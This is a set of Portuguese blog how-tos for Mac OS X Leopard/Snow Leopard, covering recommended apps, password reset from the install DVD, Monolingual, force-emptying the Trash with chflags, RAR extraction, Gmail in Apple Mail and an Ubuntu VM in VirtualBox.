Top Aplicativos/Apps for Mac OS X Leopard | Snow Leopard

Standard

Olá galera tudo na paz?
Hoje por vias de necessidade, venho mostrar “Meus” top aplicativos/apps para Mac(sendo vários pagos e vários Free). Esclarecendo essa frase anterior, via de necessidade foi que nós (Mac users) conseguimos converter mais um usuário Linux  a começar tbm a trabalhar em nosso querido mundo da maça, eis ele Little_oak… em um churrasquinho nada planejado que fizemos no sábado passado, tive a honra e felicidade de transformar uma P5GCM+ Dual Core com um vídeo modesto (8500GT) e uma poderosa ilha de edição e desenvolvimento… que bate de frente com um iMac de 5k tranqüilamente.. mas vamos ao que interessa… eis uma foto do meu Dock….
Dock
Infelizmente ainda preciso por motivos alheios a minha vontade usar aplicativos/apps pagos….(eficiência e produtividade)

Explicando meu Dock da Esquerda pra Direita
1 – O primeiro Ícone é o cara, Finder tão misterioso quanto eficiente
Finder

2- Drashboard, tornou-se muito útil em minha vida quanto aprendi que existem widgets que que agilizam e muito na hora por exemplo de ver notícias, ler um lembrete, saber se meu MacBook está esquentando muito dentre outra funções.
DrashBoard

3 – Firefox, apesar de ultimamente esse danado estar muito guloso(comendo muita memória ram do meu branquinho) esse é um dos caras que não abro mão em meu dock.

FireFox

4 – Google Chrome, esse a cada dia tem conseguido espaço cativo em meu Dock, uma agilidade impressionante, sem contar que a cada dia seguem mais e mais puglins que facilitam nossas vidas…. Acredito que tenha cache interno(brincadeirinha, mas que parece… parece..)
Chrome

5 – Safari, não poderia deixar de cita-lo pois em suas últimas versões tem se mostrado também muito rápido e estável. Torna-se por sua vez uma ótima alternativa ao Firefox e Chrome.
Safari

6 – Get Tube, o próprio nome diz… puxar do youtube, esse ablativo tornou-se ecessêncial comecei no mundo Linux/Mac, no Brasil e em vários lugares do mundo temos pessoas com muito conhecimento para compartilhar… os vídeos do Youtube são uma ótima no que tange a qualquer assunto na área de Tecnologia.
GetTube

7 – Transmission, o meu preferido no mundo dos torrente, não tem espaço pra mais ninguém nessa área em meu Dock, muito rápido, intuitivo, aceita configurações que podem melhorar e muito a performance desse tipo de app, resumindo pode-se dizer que o melhor no mundo dos P2P(em minha modesta opinião e, tomando como base o uso de diversos de seus concorrentes).
Transmission

8 – Terminal, maior amigo do usuário Linux, excepcional, muito semelhante ao Terminal Linux com algumas particularidades, me atende muito bem no que diz respeito Gerenciamento de servidores Linux de clientes e resolver alguns problemas de permissão de forma rápida e eficiente.
Terminal

9 – CoRD, descoberto por acaso em uma busca por opções de aplicativos que utilizam RDP encontrei em um fórum gringo, pessoas elogiando esse app, resolvi teatral; surpreendentemente comporta-se MUITO melhor que Remote Desktop da Micro$oft ( que fica limitado pela falta de opções de configuração de vídeo, tamanho de tela, etc).
CoRD

10 – Chicken of the VNC, outro app encontrado em fórum gringo, muito rápido, estável  e eficiente para acesso em servidores/clientes que utilizam VNC Server… O melhor Viewer pra Mac OS X que já tive o prazer de usar. Nem mesmo o Real VNC Enterprise (Pago) foi tão eficiente em meus testes.
ChickenVNC

11 –  VLC, pra mim um aplicativo que não deveria ficar fora de lista de aplicativos ecencias de qualquer que seja o Sistema Operacional, seja nos nossos queridos Linux e Mac OS ou não tão querido assim Window$, esse é um player que atende com maestria aos propósitos a que se propõe.
VLC

Agora chegou a hora do lazer junto ao seu querido Mac, os próximos 8 itens são joguinhos para aqueles momentos de folga (poucos) da faculdade/trabalho.

12 – Pinbal HD, um joguinho bem leve que é bom pra relaxar e lembrar da infância, onde era faxinado com máquinas Pimbais… o nome por sí já diz tudo, um game Pimbal a altura do Mac OS X .
PinbalHD

13 – Rayman 3, jogo de um bonequinho sem braços e pernas ( possui somente cabeça e membros) que surgiu no final dos anos 90 e que desde aquela época onde meu tio Claudio possuía um 486 com 64Mb de Ram rodando um demo desse carrinha super simpático… desde aquela época me facina as histórias desse amiguinho esquisito.
Rayman3

14 – Word of Goo, joguinho bem interessante formado por melequinhas, VICIANTE…. com versões para Linux e Window$…. parece ser um jogo besta…. mas que na verdade é muito interessante e que faz perder noites e noites querendo passar de cada fase, não tenho certeza mas sugou primeiro no console Nintendo Wii.
WordofGoo

15 – Counter Strike 1.6, esse dispensa comentários…. faz parte do manual de sobrevivência de qualquer Geek/Nerd… um port simplesmente espetacular…. roda como nativo…. posso falar sem medo de errar que roda melhor que o Verdadeiro vindo do Window$.
CounterStrike

16 – Half Life 2, outré port viand do Window$ que me surpreendeu pelo desempenho e estabilidade, dispensa qualquer comentário.
HalfLife2

17 – Call of Duty 4 Modern Warfare, esse cara dispensa qualquer comentário, Game em primeira pessoa (first person shooter) com gráficos impressionantes, ótima jogabilidade e não é um port, é nativo para Mac OS X. Ultimamente tem sido meu maior hoby nos momentos de folga(pouquíssimos).
CallofDuty4

18 – Battlefield 1942, também jogo de tiro em primeira pessoa (first person shooter) que se passa durante a segunda Guerra Mundial, com gráficos e jogabilidades não tão bons quanto Call of Duty 4 Modern Warfare, mas que faz a alegria do pessoal que possui Macs com placas de vídeo modestas como as Intel GMA950 e GMA3100, que não rodaram com maestria os jogos da série Call of Duty , mas que rodaram totalmente bem esse Battlefield 1942 (uma ótima opção para Hardwares mais modestos, como os primeiros macs da série Intel).
BattleField1942

19 – Djay, App pra brincar de DJ de vez em quandovem festinhas simples… apesar de eu não usar todo poder desse carrinha, me parece que não fica atrás de outros aplicativos para mesma função.
Djay

20 – Toast Titanium, podemos dizer que é o Nero pra Mac OS X, grava de CD a Blue Ray … é um canivete suíço no que diz respeito a gravação de mídias.
ToastTitanium

21 – Taco HTML Edit, ótimo editor HTML que conheci faz pouco tempo, surgiu por necessidade de um aplicativo rápido e simples para criação/edição de páginas HTML na faculdade.
TacoHTML

22 – LibreOficce(BrOficce), apesar de meu MacBook ter vindo com Pacote Office da Micro$oft não me adaptei muito bem com o mesmo, logo que surgiu essa fork do OpenOficce instalei aqui no branquinho e estou completamente adaptado e, que me faz ganhar bastante tempo quando preciso utiliza-lo.Tradução.
LibreOficce

23 – Adobe Phoshop CS5, infelizmente ainda não possuímos uma ferramenta tão boa no mundo Open Source quanto o Photoshop, sinceramente espero que antes de minha morte consiga ver a Adobe desenvolvendo um Photoshop for Linux, seria uma revolução no mundo dos sofreares se isso acontecesse, só pra me explicar, o uso desse em meu Dock se dá pela eficiência e produtividade que me dão esse FANTÁSTICO aplicativo editor de imagens.
PhoshopCS5

24 – NO-IP, Serviço de Dns dinâmico muito conhecido por oferecer serviço de qualidade e gratuito. Dispensa comentários. Muitíssimo útil para quando deixo o MacBook em casa em preciso acessá-lo por algum motivo.
NO-IP

25 – VMware Fuzion, Aplicativo de virtualização de sistemas operacionais, o melhor…. quando preciso fazer alguma virtualização seja para uso do Window$ ou nosso amigo Linux, uso ele; que apesar de ser pago, vale cada centavo.
VMware

26 – Tweety Deck, cliente Twitter/Facebook que mostra em sua Mesa(Área de trabalho) notificações em tempo real referentes ao seu perfil no Facebook/Twitter, Não vivo sem ele!
Tweety

27 – Micr$oft Messeger, no quesito mensageiro instantâneo em minha modesta opinião ainda estamos longe de ter no mundo mac um aplicativo tão bom e estável como o Messeger da Micro$oft, Gostava muito do Pidgin mas após alguns desgostos e instabilidade em horas que necessitava agilidade e estabilidade abandonei o mesmo e passei a usar esse mensageiro que está em sua versão número 8 no mac OS X.
Messeger

28 – AppCleaner, aplicativo que nos ajuda na desisntalação de aplicativos no Mac OS X, desistala com eficiência qualquer app e suas dependências; diminuindo assima quantidade de “Lixo” em seu Mac após a desisntalação de aplicativos.
AppCleaner

Galera, esses são meus TOP aplicativos Ecencssiais. Me desculpem se não coloquei somente aplicativos opine source ou gratuitos… Desculpem também pelo tamanho do artigo, mas não poderia ser diferente…mas esses são os que realmente são ecenssiais a mim hoje.:D

Como Resetar "Recuperar" senha Mac OS X Leopard | Snow Leopard

Standard

E ai galera tudo tranquilo?
Hoje venho através deste salvar a vida dos SYSADMINs que assim  como eu têm patrões que por algum querem usar computadores e ficar imunes a vírus de computador…. Sempre que perguntado por esses partrões que computadores devem comprar eu respondo sem medo de errar…..
-Compre um MAC Sr.X,(além de MUITO fáceis para o usuário final, são mais raros os casos de contaminação com vírus de computador) tenho certeza que será muito útil a sua necessidade(isso se não precisar rodar uma aplicação em COBOL feita sob medida pra sua empresa… ainda sim o indico pois essa tal aplicação pode ser rodada através do TERMINAL SERVER).
Pessoal, não que nosso querido UBUNTU e FEDORA não dêm conta do recado e sejam de fácil uso mas, pessoas que conheceram computação lá por meados da década de 90 associam o nome LINUX a um mundo difícil e possível somente para NERDS….
Quem “vive”no mundo da informática sabe que ninguém está 100% seguro, especialmente usuários inexperientes e com pouco conhecimento de códigos e links  maliciosos….

Vamos ao que interessa… Muitas pessoas que por algum motivo perdem/esquecem as senhas de seus Mac’s não sabem como recuperar e as vezes levam em assistências que tbm por motivos desconhecidos ao invés de instruírem tais usuários a apenas resetar essas senhas, preferem dizer que é um trabalho custoso, demorado e que custará no mínimo R$100,00 (isso se você não precisar de fazer Backup)…. Hoje eu venho mostrar que de uma forma simples e rápida você mesmo poderá sem muito conhecimento recuperar sua senha no Mac OS X Leopard | Snow Leopard.

O que precisaremos?
-DVD Restore ou Retail do Mac OS X Leopard | Snow Leopard (Restore é o DVD que vem junto com seu Mac e que funciona somente com SEU mac), caso não possuia o DVD Restore podem comprar aqui, por essa “Fortuna” e dividido em 12X você adquirá um SO que lhe servirá não só para essa tarefa mas também para muitas outras que futuramente mostraremos aqui no app.

-5 minutos pra ler uma dica do Doooguinha aqui no APPUNIX

Nada mais…. é muito simples….
Primeiramente…. insira o DVD em seu Mac…
Mac_senha1

Ligue seu Mac, aqui para o appunix usamos um Macbook

Ligando MacBook

Agora, há 2 formas de iniciar pelo DVD do Leopard | Snow Leopard e chegar ao nosso objetivo…
1 – Precionando e segurando a tecla C durante o processo de ligamento do seu Mac (dessa forma entrará diretamente no processo de boot através do CD/DVD
Método 1

2 – Precionando e  segurando a tecla option/alt durante o processo de ligamento do seu Mac,
Método 2

Sendo a 2(segunda maneira) com a “Desvantagem” de ter mais uma etapa (escolher o item a ser “BOOTADO”)
Escolha Disco de Boot

Após Bootar pelo DVD do Mac OS X Leopard | Snow Leopard chegará a seguinte tela
Tela de Boot

Escolha o idioma desejado… Após algum tempo (cerca de 30 segundos) aparecerá o Menu Superior, vá até Utilitários, Redefinir Senha…
Redefenir Senha

Chegará até uma tela semelhante a essa
Tela Redefinir Senha

Se o Mac de vocês(seus Patrões e Clientes) tiverem apenas 1 usuário cadastrado ele já aparecerá como Default (padrão) para redefinição de senha, apenas siga a interface da janela que é muito intuitiva e simples… é simples, em meias palavras coloque a senha, confirme-a e coloque uma dica….
Redefinir Senha FInal

Na parte de baixo dessa janela, há um esquema de redefinir permissões de acessos a arquivos e diretórios… aconselhamos clicar em Redefinir… Após clicado mostrará um processo de redefinição… depois disso clique em Salvar. Mostrará.
Mac_senha10

Encerre o aplicativo de redefinição de senha
Encerra Aplicativo

Encerre o Instalador do Mac OS X Leopard | Snow Leopard
Encerra Instalador

Aparecerá uma janela de aviso dizendo “Basicamente” que você perderá acesso ao arquivo que armazena todas as senhas armazenadas em seu Mac o “KEYCHAIN ACCESS” (a menos que você tenha a sua antiga senha, o que devo pressupor que não tem), apesar ser um arquivo muito útil para por exemplo resgatar uma senha de uma rede sem fio que já usou, um site que dfez cadastro e não se lembra mais da senha… dentre outros….. mas não se preocupe será perguntado se deseja criar um novo arquivo.( Como você não tem a senha para desbloquear acesso ao arquivo de senhas “KEYCHAIN ACCESS” clique em Criar Novas Senhas…. siga os passos intuitivos ( como sempre) e pronto.
KeyChain

Mac_senha14

Pessoal Desculpem-me se não fui tão didático como em outros how-tos… mas acho que deu pra resolver “nosso”problema e economizar uma graninha com “ALTORIZADAS” fajutas que existem por ai. Qualquer dúvidas dê nos um feedback…. Estamos à disposição a responder qualquer dúvida… Só pra resaltar galera… esse procedimento também pode ser usado em Hackintosh’s… obedecendo-se as “Leis” dos Hackintosh’s que é a de usar CD Boot Correto pra suas respectivas Placas Mãe…. Bom Uso… 😀

Ganhando Espaço no Mac OS X Leopard | Snow Leopard utilizando Monolingual

Standard

Olá galera…
Hoje venho mostrar a vocês essa pequena GRANDE ferramenta cujo nome é Monolingual.
– Mas Doooguinha pra que raios vai servir uma ferramenta com o nome de Monolingual?
Meu caro, sabe aquele idioma que vc sabe que tem no seu Mac mas que você nunca usou e com certeza nunca usará… essa fantástica ferramenta da fim à aqueles idiomas estranhos (sem traumas)…… Monolingual é SHOW!!!

-Mas porque usar uma ferramenta com o nome de Monolingual  para remover Idiomas que não me encomodam?
Vou lhe falar a verdade… ja faz algum tempo que uso macbook e posso te falar com toda clareza do mundo…. algumas línguas como Holandês e Polonês são totalmente dispensáveis e, além do que um poquinho de espaço a mais para músicas, fotos e quaisquer outros arquivos é sempre bom…. Mas vamos ao que interessa…

Primeiramente façamos download do Aplicativo
Aqui

Após o termino do download o Monolingual se montará automaticamente e mostrará uma interface igual/parecida com essa

Monolingual_1

Monolingual_1

Clique no Ícone/Nome Monolingual e o arraste para a pasta Aplications

Monolingual_2

Monolingual_2

Após arrastá-lo para a pasta Aplications, vá até lá
Menu Superior Ir(Go), Aplitativos(Aplications)

Monolingual_3

Monolingual_3

Procure pelo Ícone/Nome Monolingual

Monolingual_4

Monolingual_4

Ao Abrir o Monolingual pela primeira vez será dado um alerta de segurança, clique em Abrir

Monolingual_5

Monolingual_5

A interface do Monolingual é bem intuitiva… Na primeira aba Languages, o programa pede para que selecionemos Idiomas que queremos remover do sistema…..
O Monolingual dá uma sugestão com algumas opções ja marcadas (caso queira pode aceitar a sugestão).

Monolingual_6

Monolingual_6

Na segunda guia do Monolingual temos o Input Menu (menu de entrada) que diz respeito ao Teclado, por sugestão do próprio aplicativo não selecionamos nada nessa guia…

Monolingual_7

Monolingual_7

Já na Última Guia do Monolingual temos a guia Architectures (Arquiteturas), se o seu Mac for um MacIntel deixe marcado como na figura pois não necessitamos de suporte a tais Arquiteturas em nosso Sistema.

Monolingual_8

Monolingual_8

Agora basta Clicar em Remove no canto inferior Direito do Monolingual

Monolinguallll

Monolingual

Aparecerá uma mensagem (em Inglês) de segurança dizendo :
“Você tem certeza que deseja remover esses idiomas?
Você não será capaz de restaurá-los sem reinstalar o Mac OS X.”(Tradução by Doooguinha)

Monolinguall_9

Monolingual_9

Clique em Continue
Como de praxe o Sistema pedirá sua senha… digite-a

Monolingual_10

Monolingual_10

Um pouco do processo

Monolingual_11

Monolingual_11

Agora tenham calma… pode ser que esse processo demore muito, no nosso caso demorou + ou – uns 5 minutos e removeu 165MB (só pra informação eu não removi nenhuma arquitetura em meu macbook) Em um MacBook Air de um amigo fiz o mesmo processo só que com a diferença de ter selecionado todas as arquitetura inúteis, consegui inacreditáveis 3,7GB de espaço…..
Tela FInal do Monolingual

Monolingual_12

Monolingual_12

Obrigado a todos. Continuem nos visitando,teremos sempre o how to didático e direto paa melhor servi-los. 😀

Alterar leitor de PDF padrão do Mac OS X Leopard | Snow Leopard

Standard
Olá galera…
Hoje Venho trazer a vocês um how to de como trocar o leitor de PDF padrão do Mac OS X, no nosso caso o tão usado e conhecido Adobe PDF Reader do mundo Window$ e Linux foi o Aplicativo escolhido.
Primeiro entre Aqui ou Aqui e baixe de acordo com seu Sistema/Hardware.
Primeiramente irei lhes mostrar que ao tentar abrir um PDF no Mac OS X, por padrão será aberto sem que utilize qualquer programa externo ao sistema…
Veja:
PDF_1

PDF_1

PDF_2

PDF_2

Reparem que abre-se com o leitor padrão do Mac OS X

Vamos ao How to…. Ao terminar de fazer o download do Adobe PDF Reader nos links acima, o mesmo montará automaticamente sua Unidade no sistema e lhe retornará a seguinte mensagem
PDF_3

PDF_3

Clique em Continuar e aparecerá
PDF_4

PDF_4

Novamente clique em Continuar
PDF_5

PDF_5

Clique em Instalar no canto inferior Direito,será solicitado sua senha
PDF_6

PDF_6

Processo de instalação
PDF_7

PDF_7

Sucesso na Instalação
PDF_8

PDF_8

Agora que já temos nosso “NOVO” leitor de PDF instalado, vá até algum arquivo .PDF que queira abrir, clique com o botão direito do mouse e vá em Obter Informações
PDF_9

PDF_9

Sugirá a tela
PDF_10

PDF_10

Vocês podem ver que na guia Abrir com vemos que o padrão é Pré-Visualização
Clique nessa setinha
PDF

PDF

Clique em outro
PDF_11

PDF_11

Procure a pasta Adobe Reader 9
PDF_12

PDF_12

Dê um duplo clique na Pasta e verá
PDF_13

PDF_13

Clique em Adicionar
Voltando a tela de Informações veremos na Guia Abrir com
PDF_14

PDF_14

Clique em Alterar Tudo… O sistema Retornará
PDF_15

PDF_15

Ok galera agora já mudamos o programa padrão para abrir arquivos PDF, como é a primeira vez que estamos executando o Adobe Reader PDF o Sistema retornará algumas mensagem (por motivo de segurança)
Na Primeira mensagem clique em Abrir
PDF_16

PDF_16

Nessa seguinte tela vemos a Licença de Uso do Aplicativo
PDF_17

PDF_17

Será solicitada sua senha
PDF_18

PDF_18

O Aplicativo oferecerá a Opção de Instalar um plugin de AdobePDFViewer para o Safari faça como desejar e clique em Continuar
PDF_19

PDF_19

Agora já temos o nosso .PDF aberto no Adobe PDF Reader
PDF_20

PDF_20

Para encerrar o Aplicativo vá até o Dock clique com o botão direito do mouse no Ícone do Adobe Reader e selecione Encerrar…
PDF_21

PDF_21

É isso ai galera… esse foi um how to pra galera que já está muito acostumada como leitor de PDF da Adobe ou então não gosta do leitor padrão de PDF do Mac OS X.
Obrigado a todos pela visita. 😀

Esvaziar Lixeira (Trash) a força Mac OS X Leopard | Snow Leopard

Standard

Olá galera…

Vou contar um historinha pra vocês antes do nosso how to de hoje…. Já faz algum tempo faço backup periódicos de todo conteúdos de meus computadores pra 1 HD externo(é sempre bom prevenir), nunca tive nenhum problema em conectá-lo ao Mac e ao Linux ( digo, sempre exclui arquivos, adicionei arquivos… etc), so que esse dias me deparei com um  problema ao tentar esvaziar a Lixeira (Trash) do Mac, o Sistema me retornou a seguinte  mensagem “A operação não pode ser concluída porque você não tem permissão pra acessar alguns dos itens”… achei que fossem “permissões”

Mensagem

Mensagem_Lixeira

Logo pensei, “São Permissões”. Utilizei o Utilitario de Disco para reparar as premissões do Disco… mas não funcionou… fui no terminal e dei permissão TOTAL para a minha .Trash… (chmod 777 /Users/doooguinhamoura/.Trash “nunca façam isso em seus Sitemas” :()

Ainda sim nada resolveu…. Uma luz se acendeu…. Meu tio entra no Messeger… (sempre digo, ele é o cara no mundo Mac)

Expliquei a ele meu problema e o mesmo me ENSINOU como fazer….. Agora repasso essa dica muito massa pra vocês.

Vá até o Menu Ir(Go), Utilitários(Utilities)

Menu_utilitarios

Menu_utilitarios

Dentro de Utilitários (Utilities) procure pelo Nome/Ícone Terminal

Terminal_Utilitarios

Terminal_Utilitarios

Já no Terminal entre como root (o cara, o superusuário), com o comando su – e digite sua senha

Terminal_Senha

Terminal_Senha

Como root entre com o comando chflags -R nouchg (com espaço no final)

Esqueça momentaneamente o Terminal, Abra a Lixeira (trash)

Abrir_Lixeira

Abrir_Lixeira

Verá o Conteudo

Lixeira

Lixeira

Deixe a Lixeira (Trash) e o Terminal abertos lado a lado

Terminal_Lixeira

Terminal_Lixeira

Como nosso terminal já está aberto e com o comando chflags -R nouchg (espaço no final ), agora basta arrastar todo o conteúdo da lixeira pra dentro do Terminal, verá algo parecido com isso:

Terminal

Terminal

Aperte enter /return

Aparentemente nada acontece mas, vá agora até a Lixeira(Trash) no canto inferior Direito da Tela do seu Mac e tente esvaziá-la novamente…

Esvazia_0

Esvazia_0

Além de não reportar nenhuma mensagem você pode conferir no Ícone da Lixeira (Trash)  vazia no Dock

Vazia

Vazia

Foi isso galera… Tive muita dificuldade mas com a ajuda do meu tio pude ajudar a todos com o mesmo problema…. outro relevante para esse how to foi não ter encontrado nada de muito esclarecedor no pai Google pelo termo “Esvaziar lixeira a força no Mac”…

Obrigado a todos 😀

Deletar pra Frente -> no Mac OS X Leopard | Snow Leopard

Standard

Olá amigos…

Uma situação que achei estranho em meu processo de migração para uso do Mac OS X foi a ausência da tecla delete (na verdade até tem,mas não com a mesma função do Window$/Linux) na verdade até pensava mesmo que nem existisse a função de deletar pra frente no Mac OS X.

Conversando com meu tio (um MAGO do Mac OS X, conhece muito :D)esses dias perguntei a ele e ele me mostrou como fazer esse delete pra frente. É o seguinte, é tão simples que chega a ser bizarro mas vamos lá….

Basta precionar a tecla fn+delete vejam na foto.

Delete_pra_frente

fn_delete

Vale ressaltar que não consegui encontrar nada no mestre Google procurando por “delete pra frente no Mac OS X”, esse é um dos grande motivos deste how to.

Obrigado todos. :p

Abrir/Extrair arquivos .RAR ou do WinRAR no Mac OS X Leopard |Snow Leopard

Standard

Olá galera.

Se vocês são pessoas que baixam muitos arquivos na internet já devem ter se deparado com arquivos do formato .RAR ou do WinRAR, hoje venho com uma dica bem simples, como abrir/extrair esse tipo de arquivos no Mac OS X.

Primeiro vá até AQUI

Ao clicar no link acima, começará o download do aplicativo UnRarX (Rápido a eficiente para abrir/extrair arquivos .RAR ou do WinRAR) …. reparem a velocidade da conexão… :p!!!!

Baixando_unRARx

Baixando_unRARx

Vá até a pasta transferência, Clicando com botão direito na pasta Transferências ( no DOCK), Abrir “Transferências”

Ir_transferencia

Ir_transferencia

Você verá

Ir_Transferencia2

Ir_Transferencia2

Clique sobre o arquivo baixado e o arraste pra pasta Aplicativos (Aplications)

arrastar

arrastar

Ficará assim

Aplicativos

Aplicativos

Ao colocar o nosso aplicativo dentro da pasta Aplicativos (Aplications), todos os arquivos com a extensão .RAR ou do WinRAR tomaram automaticamente o mesmo Ícone do aplicativo UnRarX.

Agora já temos nosso Mac pronto pra abrir/extrair arquivos .RAR ou do WinRAR, vamos então a um  teste ….

Arq_extrair

Arq_extrair

Ao dar um duplo clique no arquivo que no nosso caso chamasse Algoritmos.rar

O arquivos será automaticamente extraido pelo programa.

Extraindo

Extraindo

Esse programa em específico extrai para a mesma pasta onde estão os arquivos a serem extraídos, no nosso caso estamos na Home do Usuário. veja o resultado.

Extraidos

Extraidos

Espero que façam bom uso….

Obrigado a todos. 😀

Sincronizar Gmail no Apple Mail no Mac OS X Leopard | Snow Leopard

Standard

Olá galera,hoje tenho o prazer de mostrar a todos como sincronizar Gmail no Apple Mail (ótimo programa nativo do Mac OS X ).

Vamos lá.

Primeiro vá até o Mail (geralmente fixado no Dock)

Mail_Dock

Caso você por algum motivo você não o tenha em seu Dock, vá no Menu superior até Ir (Go), Aplicativos (Aplications)

Menu_Aplicativo

Dentro de Aplicativos procure pelo Ícone/Nome Mail

Mail_Aplicativos

Mail_Aplicativos

Ao executar o aplicativo pela primeira vez aparecerá a seguinte tela

Mail_1

Mail_1

Entre com os dados e clique em Criar (o programa fazer todas as conexões necessárias com os servidores da Google e averiguará se os dados estão corretos.

Caso estejam corretos, você receberá a interface com o programa ja com os emails sincronizados com o gmail.

Mail_2

Mail_2

Caso receba algum email será notificado no Dock

Mail_3

Mail_3

Abrindo o programa essa será a interface ao receber o Novo email

Mail_4

Mail_4

Caso esteja no programa e queira verificar se tem novas mensagens clique no botão Receber no canto superior esquerdo

Botao_Receber

Botao_Receber

O aplicativo Mail é um aplicativo muito fácil e intuitivo de se usar

Veja o painel superior de Menus

Menu_Mail

Menu_Mail

Cada botão responde por si a função a que se propõem a realizar.

Onde temos também o botão direito(muito usado no Windows) mostra se bastante útil

Mail_Funcao1

Mail_Funcao1

Nós do appunix recomendamos o uso do Apple Mail como cliente de Gmail no Mac OS X, pois além de muito Fácil de se configurar e utilizar, mostrou também muito eficiente e rápido  na sincronização das mensagens com o Gmail.

Obrigado a todos, façam bom uso. 😀

Como criar uma VM_Máquina Virtual Linux Ubuntu no Mac OS X Snow Leopard

Standard

Olá galera, hoje vou ensina a vocês como criar um ambiente de testes e estudos Linux no seu Mac, para ser mais direto iremos usar a FANTÁSTICA Distribuição da Canonical, o UBUNTU LINUX 10.04.  Em outras palavras ensinarei como criar uma VM (linguajar popular para Máquina Virtual – Virtual Machine) com VIRTUAL BOX da Oracle(Antes era da SUN) no Mac OS X Snow Leopard.

Após baixar o VIRTUAL BOX aqui. Que além de muito bom é totalmente Free.

Dê um Duplo claque no mesmo para montar o .DMG…

Aparecerá a seguinte tela

Tela_Instalacao

Tela_Instalacao

Dê um duplo claque em VirtualBox.mpkg o que voltará a seguinte mensagem

Tela_Instalacao2

Tela_Instalacao2

Clique em Continuar

Aparecerá outra tela assim

Tela_Instalacao3

Tela_Instalacao3

Clique novamente em continuar

Agora aparecerá a tela contendo a Licença de Uso do programa

Tela_Instalacao4

Tela_Instalacao4

Clicando em continuar o programa perguntará se vc concorda com a Licença de Uso, clique em AGREE (Se quiser prosseguir com a instalação :D)

Tela-Instalacao5

Tela-Instalacao5

Depois dos blablablas de licença (brincadeira são muito importantes as licenças de todos softwares), chegamos ao ponto de escolher o local da instalação, nós do appunix recomendamos deixar o local padrão

Tela_instalacao6

Tela_instalacao6

Clicando em Instalar no canto inferior Direito,você será solicitado a entrar com sua senha

Tela_Instalacao7

Tela_Instalacao7

Depois de colocar a senha o processo de instalação seguirá normalmente até uma tela igual a essa

Tela_Instalacao8

Tela_Instalacao8

Agora vamos iniciar nossa VM para instalação do sistema desejado,em nosso caso Ubuntu 10.04 LTS. No Menu Superior do seu Mac vá ate o Menu Ir (Go) -> Aplicativos (Aplications)

Tela_9

Dentro da pasta Alicativos (Aplications) procure pelo Nome/Icone VIrtualBox

Tela_10

Tela_10

Dê um duplo clique e aparecerá a seguinte interface

Interface_Virtual

Interface_Virtual

Agora vamos criar um nova VM (Virtual Machine – Máquina Virtual)

Clique em NOVO no canto superior esquerdo

Botao_Novo

Botao_Novo

O programa te dará boas vindas

Nova_VM

Nova_VM

Clique em Continuar

Nessa próxima tela o Virtual BOX  pedirá um NOME para a VM (Virtual Machine – Máquina Virtual) e o SISTEMA OPERACIONAL que será instalado em nossa VM, no nosso caso a VM se chama AppUnix e a o SISTEMA OPERACIONAL é o Linux Ubuntu

Nova_VM1

Nova_VM1

Agora é hora de determinar quanto de memória RAM da sua maquina irá para a VM (Virtual Machine – Máquina Virtual), em nosso caso como temos uma máquina modesta com apenas 2GB de RAM colocamos 512MB para a VM (Virtual Machine – Máquina Virtual), o que se mostrou suficiente para nossas necessidades nessa VM.

Memoria_VM

Memoria_VM

Agora devemos determinar configurações para o HD da nossa VM (Virtual Machine – Máquina Virtual), no nosso caso resolvemos criar um novo disco (se você é iniciante recomendamos que faça o mesmo)

HD_VM

HD_VM

Ele dá boas vindas ao utilitário de criação de Discos Rígidos Virtuais

HD_VM2

HD_VM2

Clique em Continue, você receberá a seguinte Tela

HD_VM3

HD_VM3

Opatamos por um disco de tamanho Fixo, mas vc pode usar Armazenamento Expandido Dinânmico que, é um disco inicialmente montado com o menor espaço possível necessário para a instalação do sistema e expandido dinamicamente de acordo com a necessidade do usuário mas sem a necessidade de configuração manual(A expansão é feita sem intervenção do usuário, quase que imperceptível ao usuário)

Na Etapa seguinte precisamos delimitar o tamanho desejado para o HD (no nosso caso é 8GB)

HD_VM4

HD_VM4

Clique em Continue no canto inferior Direito.Aparecerá um resumo com o Tipo, Localização e Tamanho do Disco

HD_VM5

HD_VM5

Clique em Done para prosseguir com a criação do nosso DISCO VIRTUAL

Segue Screenshot processo de criação do Disco

HD_VM6

HD_VM6

Após terminado o processo de Criação do DIsco veremos

Execucao_1

Execucao_1

Dê um Continue

No passo seguinte será pedido a Origem do disco de Instalação

Execucao_2

Execucao_2

Você pode usar um CD/DVD comum ou uma imagem de disco .ISO (recomendamos .ISO pela velocidade proporcionada pelo mesmo)

No nosso caso usamos uma .ISO, então teremos que clicar na pastinha para mostrar ao Virtual BOX onde se encontra nossa .ISO

Execucao

Execucao

Chegaremos a seguinte tela

Execucao_3

Execucao_3

Clique em Adicionar no canto superior esquerdo

Execucaoo

Execucaoo

Vá até onde está salva sua .ISO selecione-a e claque em Abrir no canto inferior Direito

EXEcucao_4

EXEcucao_4

Ficará a tela seguinte desa forma

Execucao_5

Execucao_5

Clique em Selecionar no canto inferior direito

Execucaoooo

Execucaoooo

Na Tela Seguinte clique em Continue

Execucao_6

Execucao_6

O mesmo dará um resumo do seu tipo de disco de instalação (nosso caso uma .ISO)

Execucao_7

Execucao_7

O VirtualBOX dará uma mensagem assim

Aviso

Aviso

De OK para continuar a instalação.

A máquina será reiniciada tomando como boot a sua .ISO ou CD/DVD escolhido nos passo anteriores

Nossa primeira tela de Instalação ficou assim

VM_1

VM_1

A partir de agora começamos de verdade nossa VM (Virtual Machine – Máquina Virtual) Clique em Instalar Ubuntu 10.04 LTS

Chegaremos agora à tela de escolha de Local onde vc se está (Fuso Horário)

VM_2

VM_2

Agora teremos que configurar o layout do teclado…. Em nosso teste foi usado um Macbook White 2009 e o layout é USA-USA internacional como na imagem

VM_3

VM_3

Chegamos na escolha do disco, faça como na imagem abaixo

VM_4

VM_4

O utlilitario pedirá seu nome e uma senha(nunca esqueça sua senha)

VM_5

VM_5

O Utilitário lhe mostrará um resumo de tudo que foi defenido anteriormente sobre a instalação

Resumo_Instalacao

Resumo_Instalacao

Seguem alguns SCREENS do processo de Instalação

Instalacao_VM1

Instalacao_VM1

Instalacao_VM2

Instalacao_VM2

Instalacao_VM2

Instalacao_VM2

Ao chegar nessa Tela

Instalacao_VM7

Instalacao_VM7

Peça para reiniciar, você recebera uma imagem semelhante a essa

Instalacao_VM8

Instalacao_VM8

Onde o Utilitário pede para que você tire o disco de instalação. Caso esteja utilizando uma .ISO como nós do app, basta CLICAR no Ícone CD

Tirar_ISO

Tirar_ISO

E depois clicar na .ISO marcada pra desmarcar

Tirar_ISO2

Tirar_ISO2

Feito isso,você não corre o risco de entrar no processo de instalação novamente.

Doooguinha como faço para iniciar minha VM (Virtual Machine – Máquina Virtual)?

